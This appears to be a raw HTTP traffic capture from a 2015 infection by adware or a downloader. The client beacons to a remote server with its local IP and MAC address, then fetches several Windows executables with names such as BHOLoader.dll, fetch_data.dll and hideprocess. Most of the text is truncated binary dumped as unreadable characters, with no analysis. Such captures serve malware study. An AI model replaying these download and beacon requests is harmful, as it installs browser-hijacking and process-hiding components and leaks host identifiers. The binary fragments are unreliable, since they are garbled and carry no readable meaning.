GET /txt/list666_20150529115418.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=468311E3A962395C6AA1EB5AE134BFF6 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
GET /txt/list666_20150529115418.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=468311E3A962395C6AA1EB5AE134BFF6 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:24 GMT
Content-Type: text/plain
Content-Length: 71356
Last-Modified: Fri, 29 May 2015 03:54:18 GMT
Connection: close
ETag: "5567e2ea-116bc"
Accept-Ranges: bytes
GET /bho_loader/2014-09-04_09_22_38_003/BHOLoader.dll HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:46:39 GMT
Content-Type: application/octet-stream
Content-Length: 57209
Connection: keep-alive
X-Request-Id: 5b480a8636a9c82ad77a71c0d3687a89; aaf93b24edaacbea60fd3cf9a984ca16; f5aed991e02259cc470b700031d517ff
X-Source: U/200
Last-Modified: Thu, 04 Sep 2014 01:22:39 GMT
Expires: Wed, 10 Jun 2015 14:10:58 GMT
Cache-Control: max-age=686094
Accept-Ranges: bytes
Age: 40235
X-Cache: MISS|MISS from cache_img_88; MISS(S)|HIT from cun-sd-tao-076; MISS|HIT from usn-us-sms-098..MZ...................@....................!..L.!This program cannot
be run in DOS mode....$Z.....t.ap'.....}|'.ap'F}~'.ap'.Gz'.ap'.~{'.ap'
Ki/..QFi-'.8.1q'.(..{0..:At'.ap'RichT..g.....PE..L...c..T..r...!......
...`..................(.....0....!............)..8................E...
....d......_............1...........text................. ..`.rdata...
.............R@..@.'...DS... [email protected]. ...`[email protected]
.................g...D$....V3............T$.RP.t$..Q........0D$.#.....
.#....SR.T$.Rj.P.Q...uZ.\$...uR.D$...t0.T$.F.....RSP....u..D$...t...P.
Q........P...R..D$..T$.X.%..Z. t.....P...Q...[^..........Q.D$.V3.;.tc.
.p.Rhh.......t. |L....;.tD.T$..t$...Rh(#.p.Q...|"....;.t..L$.QP.......
.D$......P......G^[email protected].
..S^.3.^F..QSUVW3...`9...|$ .\[email protected]$.UWQ........
.P.....X.A.D$....P...8.g_..^][.......L$.j.PQ.....M.....j.h....d...@Pd.
%.......SV..W.t$..F.P.......D$.3.j..|$([email protected] .~$.^(.D$$..
..t....L$..~`.N\.~d.~h.T$..D$.RPhp ...D$0........~l.|$..|$ ..f....t..D
$.;.t.P...........<m.........._^[d...."..a.rQ.. ..........V........
D$..t.V..iA.Q.^...................|$........G`[email protected].<
.t.......Q.m^....O(.w`.wd.wh......_ .o..D$ ..3;.t....6P...........;
.u..M.Q.*C.....3.W.E..E...v.L$._^]..!..P.....VWh. ...C(.{(h.......\$..
P............>.......j.V.5..............h| ..;....R.%.....Cp....2.
.][email protected]...\....I.....v..uh...K...t).A!..."<.t...uI..
U.A....g....\$._^].Cl[Y...u.j....M....C....w.;.s.".. ...U....*...{<<< skipped >>>
GET /browser_assister/2015-04-21_17_19_51_110/9132e24c26751eba1b161bd07801b762.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:46:44 GMT
Content-Type: application/octet-stream
Content-Length: 414887
Connection: keep-alive
X-Request-Id: e53d8163bbd3bca64131c4ac67b2412a; 9149848c88d3fd6ca3e92456c0b77697; 8dc45fba0af04f124afa4838b4ec2b90
X-Source: U/200
Last-Modified: Tue, 21 Apr 2015 09:19:56 GMT
Expires: Fri, 05 Jun 2015 10:16:32 GMT
Cache-Control: max-age=667295
Accept-Ranges: bytes
Age: 467507
X-Cache: MISS(S)|MISS from ctn-zj-hgh-092; HIT|MISS from cun-sd-tao-070; MISS|HIT from usn-us-sms-098..MZ...................@....................!..L.!This program cannot
be run in DOS mode....$Z...dD...*......T....*.Y.....*[email protected]........
&.*..}. .Q.}...@.. ...*..r...([email protected]....
.6U.............r...p.....*.........&....a...... ....2. .U......)..,..
=..........P.....C.@.........$:HC...............text...lq.......0... .
.`[email protected]@..@.'....H..............%..6....rsrc......
,.!.. .....P........F..h.}G......Y.....h..............................
.f@~G.............f..G......`...........o..f .G.._.......O.....%H.h.%H
...H.G.P..L.G....I....-U......P.H.3..E..E.P..<.G..E.h..G....I......
.M....3........]@..j.hjQG.d....PK.`P.E.d.....h.'H.j$h..I..E......t...3
....8..'H..7....D....I.Ph......b..h..G...4.I6.....x.......M.d.....Y...
..0..X..............h<.I.....(..... [email protected]@.'.. [email protected]...$.
.E.....j.j...:..h.L.g8.I...).....`..G..L...]........h..I........$..G..
6[. h....*[email protected]...^[email protected]...<...h0.I..
...G..h$]. .... h...........I..%...h8...... [email protected]..."..L......
.-.....`...o... [email protected]........$......\$H.D$H...-........QU
..V.u...tP...r...;.u..........s....t5..:.u'...t*.A.:B.u....t..A.:B.u..
..t..A.:B.t......^].3.^].`..........E..t.V.b...h.^].....x....y.....U..
j.h.?`.3...c.V.E.VWh.....}.j..u.....k.0.F.).r.F...F...p..3..F....Df.F.
.F.f.F .F$.F(.F,.F0.E....u(.E..E...H.P.M..i...h..H..E..E...H.P.jT..WV.
............_^.M.3..~.P......V..V......F,.....t.P.0...0.F,..2.F$......
...2.F...............#..E....2.F..........#.Fs...........^.....p..<<< skipped >>>
GET /config/2015-04-28_17_53_38_445/85dee9b165e73277b343582bbc0abdce.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:46:51 GMT
Content-Type: application/octet-stream
Content-Length: 16021
Connection: keep-alive
X-Request-Id: c72c8390de4e17724de7685b042d0ab3; eb12280e9a2f424ebe112d688c68fea1; f8cc4faca9efb76ee37aa23448c9214b; c5debba4eac524c91ad94922bf47e895
X-Source: U/200
Last-Modified: Tue, 28 Apr 2015 09:53:39 GMT
Expires: Sun, 07 Jun 2015 13:27:51 GMT
Cache-Control: max-age=656634
Accept-Ranges: bytes
Age: 272574
X-Cache: HIT|HIT from cache_img_86; MISS(S)|HIT from cun-sd-tao-074; MISS|HIT from usn-us-sms-098.GEMCF...q.KQBJ!FNpm$ \OpC..Z.TSN0....Y)[email protected][email protected]_.N..ES.K1
.HB..u[ML..Y.CSRV0....7@GJY.].SHBI4.XB.A .@@L.Y.KLNT'$...R)YT.L.B.....
#[email protected][M7V..R.f.MJUH..;.O[/...Y.=ANS...T..DU-]\Z..m.....E.XK
PMnQH.Q.p@F[].]..[CS#NDXNM1C.HT.N.X.......\[email protected]?A.LN...H.A..
C.l.qV...KOH..5.Y).....M"I[QQ.m.P@F._IGSJ.....P.o....S.J....s..`*OL..R
......<CJD.[pMLB]S.S......JIQ.m...E.K.]UI]mW..S.k2.UB.K..~.p...P..F
6..Z.po.....B~...F7V\..D4WZ.B.G.SKP.q.XBNM0RTXVO..aI%@YN.....L..W...J!
RX..A3$....WLUS.F.N.C"YTX.....RBN<TE.U.)L [email protected].
[email protected]@..<V\ZNXl...B.H.A^(..~.`WH..F.$.;oVIV.17C.z.@..
O.D....A.U.h...9C.@Y_.3N..X.=@_XC.D.AD.Y.][email protected].@:HEK.\pMM.O.
O.Q.ON-MWZ.Yp...V.Z.qY._7OM.R..UI^%Y.Z.I9BNV.Q)D..XD..V.]IL]H.s.....h.
..T.K.Y/[email protected]@.W~.q...O7JVl...F]UR/LN..
G0OM..Q$.r.^.I1[......0VQCz....FO.O.{KE.(UFA..l..DD.E...z.`Y<BLYD..
..NT$DS..].V..E.Q^Fd.E..J.l.B.XO/..Q.PL..H.P]1ILZ ... .....G:........Z
.Xr.J.P.h....W.^....#.H...sOE$...h....^sD..R.mJ....IU..C.$.I.MH<..K
GS._....#B...Hl..K.U.PE...yG..T.n..M.Y...Z._q.....:.FMD......[m..KY.=.
B..V.R...."E.N..o.A..QHT....#B..RJi..N.U.VB...xE..Y.=...D.......p..HQH
=K.J.Y.J.ZB.w...V.j.......F.._t.MK..jKFM.L._...^y..N.O=..M.W..G.AXt...
..g...C.O.._.XqGO.TKm..ICRLP....#C....<.B..Y..._..&E....sJ.MCY.R.X.
\%.H...;..LCXNQF^E.#...M.mO...QI..X.\u...!Hi....Lk.....v.jKW.n..v.`L]H
.r....1q.WA.X._....u~..T.f....>.^....y..rM.f....R.8....r...Vqs....S
.T.c..`E.Ao......H.OUYm...P.k..p.X.^....Z...X.g....>.^....x..rM<<< skipped >>>
GET /dticon/2015-01-20_16_16_53_418/39e2da53a78de3bbf7b66e0060d1d24e.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:46:55 GMT
Content-Type: application/octet-stream
Content-Length: 227879
Connection: keep-alive
X-Request-Id: d5941be296a7c272f10744274c1725a2; 3d3e824cb3467a9fb63057493af2f01f; 8d24d23f7c67e8c505ebe2e94e3d5363; 405cf54c09a2caa748497801b9acab61
X-Source: U/200
Last-Modified: Tue, 20 Jan 2015 08:16:57 GMT
Expires: Mon, 08 Jun 2015 01:24:50 GMT
Cache-Control: max-age=667973
Accept-Ranges: bytes
Age: 240898
X-Cache: HIT|MISS from ctn-zj-hgh-091; HIT|HIT from cun-tj-tsn-075; MISS|HIT from usn-us-sms-098[email protected]...........!..L.!This program cannot b
e run in DOS mode....$Z..Hv....f...Q.E.....1..G.......f..o.....1...0..
g.q.f.)`.....1...0.....1.....1)`[email protected].......!.
....:...x.............P*.!....R..... [email protected].........
[email protected].. R..8.....:.....BP...........text....9
............. ..`.rdata......Z....>).R@..@.'. ..U.. ...R.....M..(..
..rsrc......,..X([email protected]...\(..BY.....)..h......\P..h.H...
*...Y......j.h......d....(..h.&...&...j.j......hpH..........C...U.....
.E.P..DP...E.h I....Q...........]r.uhPI....B. [email protected].%...P.
..h`...k........(.....u..............hp.....!.:1. h{=.........."......
.......h....... h.......p.......".....&........V3...tR.:.tM...&.E.PVh.
...VVVRQ.. P....uO.u..u..u.P.u..u....P...u......`.D....H. .^6..0.bj..u
.Q/..,..&..........`[email protected]
.u..M..u.QVVP...... .E-..P$..Q..3........U.........p ..3..E.SW........
..........W..|................Ph....j.WS.............P..V...I......q..
[email protected][email protected]:..uE.... ..%...W.......t.-......
_[.M.3........].W....0...........w.........M._3.[.b......... .).. .pV.
............................;.......Wj\S..V...............G...........
.......... .;..G.....VSP..........,....B.....5:....N...F..u. ......=..
...VWP..=...=...=..n..b..... [email protected]...#...............Qh....j.PV..`.
[email protected]. .......RJ..u.".PSP.........t(G..t
.3......_.#_^..".....v..G..-....-.... .^......U.............@$.E..<<< skipped >>>
GET /fetch_data/2014-08-21_17_15_35_123/fetch_data.dll HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:47:00 GMT
Content-Type: application/octet-stream
Content-Length: 128931
Connection: keep-alive
X-Request-Id: 4f2430bbe391f89e8b8a81ccc80dc396; 456202ee7534af014907b39d32ee5e85
X-Source: U/200
Last-Modified: Thu, 21 Aug 2014 09:15:37 GMT
Expires: Wed, 10 Jun 2015 15:58:08 GMT
Cache-Control: max-age=672278
Accept-Ranges: bytes
Age: 20012
X-Cache: MISS|MISS from ctn-zj-hgh-093, MISS|MISS from cun-tj-tsn-075; MISS|HIT from usn-us-sms-098[email protected]...........!..L.!This program cannot b
e run in DOS mode....$Z.............p.q.......i....1W.....V.%.....5...
.1%[email protected][email protected]......!..
....................0.......`...........2.0.M.... @. ..,.....@...... .
..h.......x..0..(.........,...02..8.....:(....B0...........text.......
........... ..`.rdata....................R@..@.'....\9............(...
.rsrc......t...([email protected]..............(..B......%..hp).......Y.....h`
.......P........%X.......h.............|.....u......h...l...h.).....!.
.1. h.=..........s.............h....].. h....Q..p......."......;...}..
....U..j.h....d.....P...VW.p...3.P.E.d.......}..E...0.E.)..j..G......G
....h<........-...}...E.(..Iv0.E..0;.t'.I.j.j..F...P.!'..j.h.......
#&...6;u.u..M.......u............M.d......Y_^..]......v...j.hx..b.....
[email protected]..$.;.0..B%.1.......P
........0................p.......i......D$,..$....P...0...D$.{.......0
...=.0..h0......=6.............. .;L$,.......^...L$l..$....y.`...D$|..
..D$l... ...D$...C.D$ ...;.........D$(...1....L$(.........s.F..L$()...
.D$d.t$.....P..t..L$(.=3.....F8...|$t.t!.|$x....d.CD$dP.0...h.....@...
......u.L$...,...Z..x.r..t$d...x.2.=4..@.........#A...D$0P.L$H..C...&l
t;........C.......$.{....D$8..P.......$..........D$D$... ..x ..L$l....
...@....@...$....tbh......$.e.P.$.......P.>9......D$|..$........|Ph
......$....h....P...C......6.%..6...^.._i..$.8i..d...f.MdPh0f...f...j.
!;[email protected]$xe.0.D$..a..D$d...2|.. .a.L$<.....*......-..|......<<< skipped >>>
GET /goto/2015-03-04_11_08_47_750/8a707cad6b1fef87a10bfdfc2cc42684.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:47:05 GMT
Content-Type: application/octet-stream
Content-Length: 252624
Connection: keep-alive
X-Request-Id: c4109171c08354e3f45a1ad9c1f52117; f79cf9d216a55a01bdd5fcf0ac5989ae; 42d75530002f19947f0d3f973db1e3b6
X-Source: U/200
Last-Modified: Wed, 04 Mar 2015 03:08:51 GMT
Expires: Wed, 10 Jun 2015 00:02:59 GMT
Cache-Control: max-age=679033
Accept-Ranges: bytes
Age: 84080
X-Cache: MISS|MISS from cache_img_87; HIT|HIT from cun-tj-tsn-073; MISS|HIT from usn-us-sms-098..MZ...................@....................!..L.!This program cannot
be run in DOS mode....$Z..H.jt.q.'...)..'.q.'J .'......'.q.'...'.q.'.#
.'/..1.'.....'.q.'...'...1.'.P.1.'[email protected].'...1.'.0.....1)....@Rich|.....
.PE..L....t.T.......!........................:.!....R..... ....2...].q
[email protected]@...K....ZP...;......:.M...O....
P.......text.................. ..`.rdata..|...Z.....).R@..@.'.0.H. ...
[email protected]..(.`@.relo).......]<....(..BY........
h.........Y.....h............o......._.......O..e@....?...&U......E.P.
.D....E.h.....`.............][email protected]. .... h...................
....p.l.....:..........h.....t.....$..................2.....@..!....j.
...X$.....P$...F...H...T...L....h@$...........h....._....%...?...h....
)...f.....u......U...E..V........t.V....&.g.^]...-..0...E..U....H.]..
......U.....u.R.P..U..H.;J.u...;.u.....9."2....X.....`..;H.u...;E.u...
-....`....L.......U..QV.u..E......$=...u........L...E..F......Fb......
.:.u.3.QR...[.....^......W.y...A..u. ._"..9"......$.E...V{.c..u(j.u.#.
.w..h.L........q.uPV.:.....O...M.../n<....{o......Y"..U..V.u.V..;..
......E..0t..@.....^..D.@[email protected]........_.
...W.z...Bs.!._ ... ..X.....V...~..r..6.P....j..^...#U..S.].VW...M..{.
;....... .9}..B}.;.uG...9F......._....F.r...Qj........u..._..^[]......
..\..............F.;.s$.v...W......M...tj.{..r...e...r*...(..u..~....r
..._....g.r._^[...s....t.W...PR.h.....D...~.r.....8/..,.........h M...
i3...._......;'3....0...}..VW.}...t"e...r.S....t.WSV...}.AS...~.C[<<< skipped >>>
GET /goto_cfg/2015-06-02_16_12_03_271/dacd897d79a3362dcadd74dad2ac6aa7.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:47:13 GMT
Content-Type: application/octet-stream
Content-Length: 7776
Connection: keep-alive
X-Request-Id: a453f74a7d64b13acad0d504fc582b16; 7a396f845a2e2492b4377a23a2ac0097; 2e004e7f159702521d50c479b24d71ce; cbbc5f57908fd61fe43f33dfaf374b42
X-Source: U/200
Last-Modified: Tue, 02 Jun 2015 08:12:04 GMT
Expires: Tue, 09 Jun 2015 22:18:45 GMT
Cache-Control: max-age=655565
Accept-Ranges: bytes
Age: 66874
X-Cache: MISS|HIT from ctn-zj-hgh-096; MISS|HIT from cun-tj-tsn-075; MISS|HIT from usn-us-sms-098...............................O)...$k....62a8^&Q23.I14.....#p...bI...
).W.iXB....P..mL.$....TX"...b...... .s..m_P.\.".a......>.I.i.....F.
.b........"3.`xf.[.."X..w.#@P*@%...#.e.G.`L*X.A.....Y.A.....v.(..../.n
..!O...]j....`\x...e..;.F.k.6..a..5......-?s....y.h..7.[.....8.......%
5..q.....~2.!..a.P........9.t.. ..`Q...P......ZFC9b.Q$4L.ot.V.._..(.K|
.H...B.2&..>...X...<...n..ah/..=..i.?5S.c.PA..."...4 @..B)......
.....,.g-hv..rh*...5...T.&uY@... |Pf..#.~.u...#..rv.t'\.dx`...........
....e.}C.L.........2.n=.bl..o;....#fk<O.ySh.c.....R. ...G...G...U.i
.........|4...6........E)...o........E?..q!.x...............#..Z.4f..f
.W...H#.....t.R.......H...u..V)D.<*V....3Y.....]...{t.T`.tw..&Jm...
.G...... ..f..*C....\....A....8.$............d[=.....5...*}.0....\..^.
...L..Eb....0......j..b.R@..]....i [I.......3........._..q......,.....
.5o.......lh..m.|...dP,....XJ...&..O..y.............".....}|.:I.S...J.
?A..dk......#6'.% 0b~....l..k.n`..-...Tmvy....:.}.t.....&..]......$...
.....I....*.`.D.<.R...p'_Z..`..p..:.b 0.l.G.. .........;.g..x....'.
...a.yAU8.G...4y...{........n...!..e\F.....8.~....d...4....HX.E(e.D..0
_?.I.Ml1..R.%!.{....G%E...&.u.6...s...c.........#J0d..\...n.y..X.D.9s.
.......E...C.P..._&p.k.e.{7..p.K...Hd...Oh..j...Q........P./ <=.<
;..K.`.m..X.w....U<.T..$....'Ry..yb!.)Z}..__..^.e.............F.ud.
.F.Ri..._........]..;.....}..........D.......^/. ..}.......$.....xq.).
.s..e*..'iQ....a....:...Fm.......}^....`..`<Z.......)T.>......c.
../...........h....|M..5Y.F0......QA2.....HS.........H.......C....<<< skipped >>>
GET /hezi/2014-10-10_16_08_46_989/c0382aec756b29bb681ba05757fbe2e3.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:47:20 GMT
Content-Type: application/octet-stream
Content-Length: 451789
Connection: keep-alive
X-Request-Id: 38052415f2f5c34fab65f2b0289cd2ce; 6b0210e182a42e6a5622ee22e84cacfa; 2c570de857ed50be654376b6abf88f3a; 84017f0f5a95c2a62480852635ed69da
X-Source: U/200
Last-Modified: Fri, 10 Oct 2014 08:08:52 GMT
Expires: Sun, 07 Jun 2015 01:09:06 GMT
Cache-Control: max-age=681976
Accept-Ranges: bytes
Age: 342272
X-Cache: MISS|HIT from ctn-zj-hgh-095; HIT|HIT from cun-tj-tsn-070; MISS|HIT from usn-us-sms-098..MZ...................@....................!..L.!This minibox cannot
be run in DOS mode....$Z..G......F...P..F...F...F......F...F. .F...F$"
[email protected]][email protected]......
....... [email protected]....! ...Q...............4...
.....P(...TS.R...LPl....!:.o..._0..0.J....text...6............. ..`.rd
ata..$..........R@..@.'[email protected]....`......P...
.................O...u.3...A .......D$.P.....Y..................A j.P.
.p8A.,............T$..T$..p.........t....Q.P......P....<.....QV...N
....PQ.D$...........t..F... ^Yk.....0...n0..._......t.P..T0A..F ...X0A
..N(^.%l1A.]..%.....(.D$,.L$0.D$.3.PP.T$4R.L$.P.L$.QP.D$.(...f.D$$....
& ..D$(.D$,.D:...4.D$8.D$<..P0A...(...GQ.T$.3.9L$...$....D$..D$..L$
.;..L$..T$.u....P.S..U.l$.V.0W.y.U.h..@. .U .P.A..I.R.T$0V.... .P .QWS
R...6A._^][Y.j.h..A.d.X...P...VW.(.A.3.P.D$.d........t$..D$(Ph........
.3..N|.|$ ...:A...|[email protected]....... .`........!.......
[email protected][email protected]$4..E....T$.R..x8A..D$..L$..F
t.Nx...L$.d....aY_^.....Uj.h....'QV........{..v.P........$..p.........
. ..9.........<.....>.2.N|.......D$................^............
.Gj.h:...S........t$(3....\$....1A..|$$P.....1A..\$..\$,S{[email protected]..
.PS.....1A.P...T..AW.....0...O....0_^[...0...F.P...9A.......D$..t.V...
....^g.... QV.. .........,..T$..F.....^]..p... ..V..t.....3..L$...t..I
...3..T$,..... $P......(...(.......,.P.R.P.R.P...RPQ..Q.t.....F.^.(.3.
[email protected] ......9k ......W.|$T;.u=.C.P...8A...8..S..L$&<<< skipped >>>
GET /hideprocess/2015-03-23_11_11_56_660/5a68951313d2d591998e790faf81a039.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:47:29 GMT
Content-Type: application/octet-stream
Content-Length: 131253
Connection: keep-alive
X-Request-Id: 5c0b395c52cb0988f35dd63948d4c9fc; bc97604dddda8a3ef0be77b0b847f417; 75fc99a2b730438414b753605f89a35d
X-Source: U/200
Last-Modified: Mon, 23 Mar 2015 03:11:59 GMT
Expires: Tue, 09 Jun 2015 11:56:15 GMT
Cache-Control: max-age=651107
Accept-Ranges: bytes
Age: 88755
X-Cache: HIT from ctn-zj-hgh-099; MISS(S)|HIT from cun-sd-tao-069; MISS|HIT from usn-us-sms-098[email protected]...........!..L.!This program cannot b
e run in DOS mode....$Z....J,..$...........$.?A....$........1........#
.$......8..%[email protected]....|.U......
!.........P.....p=....... .......`[email protected].......
.....b...T...d..BP...K.....`...#...!..8.....:`....O ...P.......text...
............... ..`.rdata................R@..@.'.....|.......\....(...
.rsrc.... P.%.E....L.....P.areloc...P.`...1...(..B0.....*.......h.....
.;....*..Y....uh........ hp..$.)&. h`.........9.......h........K.....&
U.............3..E.h.................j.P.S....E.P.u.....P..x!.........
. ...M.3........]........w..$......................Vh......j.V..~....o
V4.....0..........t....t3.B......u.jxh.w..h.w...7...j7....&......3.^..
..F..B..F.....^[.....U..V..W...>y.Gt.jZJ. ..J...3._^]...u.j[....y..
...0Sh.A...^.j.S..~..h.....C....V4.j P.s...~...M.... .........E.....0.
....$....F.j&.. [email protected]....$..uM9%.Bt.ja..b.x...?.....8....r.jb...`..
."..........3.[h....0..[..........W.}.jpj.......V.X}[email protected]
t.hX...h.|w.'....0.>...._.F`..FH......"....D...............SV...D$.
].....W.\$........t.h...b.|[email protected].........;.t....;.t.h.4.c8}
....4....K....w7...v....u-.......Y......s...... ...3......4.`...h.~...
!-....Qh.~........R..P.......].P.......!..a...... ...3........4...;...
h.~.....Q@...@.`......F.......x........................@..............
..............tW...t.hN....!....q.............0S..g.R...h...... ..3...
.. .g6...*..<. h$3..,.."3.....(..^.!....1Ph,>...>. .._...<<< skipped >>>
GET /txt/qpqpqp_201505291802.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=1FC77115C819B7258FC1528899CADE7A HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:28 GMT
Content-Type: text/plain
Content-Length: 131376
Last-Modified: Fri, 29 May 2015 10:02:33 GMT
Connection: close
ETag: "55683939-20130"
Accept-Ranges: bytesnHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WtCdFRaA9XVxQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnJSg1HDvu0fCwtUwmory885X0B08Nr3lSxBaIDqW2
l3RvsY GH2UJAHUCXzx4 mkGqSCDSlCWbCA IgmipfV8VJlwpOcrOixJhd4iH5KuvIsTa
zQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay0C63Xri3dBT5GlbXQrd n3YNPrA6SxfVvh3CJHt4
bI9xlBmLsuLjPgwpxgTHibCn0Fz4eYFSdrlycn0DaQTrWJvgEYtUqAbYm ARi1SoBtCfJw
2WASts57NldsOW7Tl sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrL8AYVCLiuZ
CCMVbBdE 4V8TazQ2ZSPlrxNrNDZlI Wvi03Nmtgxjj8TazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a8TazQ2ZSPlrbgZhvAzHEaPE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrTPMmJn/9ziEHRmRKbAnM6osYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMax
jFZ72jWZM7wxJ5/Dkgp0v8b7UsTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWAvJ46JuW9FgLJ
Z8KCVZBu3E2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI
WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y0/hTLesNO
U3zfwD/apg uknevZ9E Uwawl3GIUk3N3uiy6tRS5Dm3Sir1KGo8YLxbG2cKNuElZSmmL5
PfQjk3LmCUAzwPyKFymTuNpzKZ3D9LE13E7e3X22xoBkwrLDH iwt 0EC6c7IQTYRMkU0E
7CDhDBtJFxElLm8XRdVeGS10qqLxRG/4nXI6Gb0tSXPVdrB8Cjc3Loba CrlOlo7Gz<<< skipped >>>
GET /wb/adb/?Ab0D41yOowlXG854AY2UdElLsL5dm7fYae/MQ3O0WhoSzLAdfLxhwJInbX2UCwLX9zg2ns0ytLlKvANXi6vZsuSO7lqv9ZBePoDGa7XS FZhtut5BNw4nkVgQsKYOnKIclHKczDQt4CNpC5b/6amYRI44eLhwQ9vojjOVMdi2zkXOfAiQVwnUjdvdw7rKpi/ HTTP/1.1
Host: app.log.soomeng.com
Connection: keep-alive
Accept: */*
HTTP/1.1 200 OK
Server: nginx/1.2.0
Date: Wed, 03 Jun 2015 02:47:27 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: keep-aliveGIF89a.............!.......,...........L..;..
GET /main/2015-04-02_20_12_07_789/c8e92c77cf34b8aedc5df0f1d858db72.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:46:20 GMT
Content-Type: application/octet-stream
Content-Length: 648089
Connection: keep-alive
X-Request-Id: f410d7e60b27d4cece23e29d91736289; 9bc8c2544f2a3e1cbeb5bc3e10f08654
X-Source: U/200
Last-Modified: Thu, 02 Apr 2015 12:12:21 GMT
Expires: Wed, 10 Jun 2015 06:11:15 GMT
Cache-Control: max-age=657318
Accept-Ranges: bytes
Age: 247900
X-Cache: MISS|MISS from cache_img_86; MISS(S)|HIT from cun-sd-tao-073, MISS|MISS from usn-us-sms-098..MZ...................@....................!..L.!This program cannot
be run in DOS mode....$Z...N.../....Q.}n....1P.x...Q../...W"..(.......
..XT.. [email protected]....!.U.................@..
..hI..............a...... ....2.p E....!@.)..,..=..........Pd....C.@..
...................8.....:.....O....P.......text...w............... ..
`.rdata.....T.w.......&...."@.'[email protected]...."
..t.%R.$.....P.areloc.............V(..B0.....2.U..j.h:bI.d.P..P...\.3.
P.E.d...1.E......|._.P"J..E.....h..J..........M.d..(.eY..].....`..t`..
..`........lq.o..J..{q...p...p...xp......p..`p...p...h.._...h.J.h...V.
...Y..&h. ..p ... ... ..` ... ... ..P ..{ ..../............&.$....`./.
....5h......0.*....%.. ... ... ...j.....J...._....h$P.j..J...0.&hD ...
..{ ..\ .. ..[ . h,[email protected].. hJ...!..p..k_..
j"..T.......hh._........$^.. .... hm.........B.....@.<._.........._
[email protected][email protected]........$....
..\$H.D$H...z..z.....QU..V.u...tP...r...;.u..........s....t5..:.u'...t
*.A.:B.u....t..A.:B.u....t..A.:B.t......^].3.^]...%.G..-QVB.S...u.6...
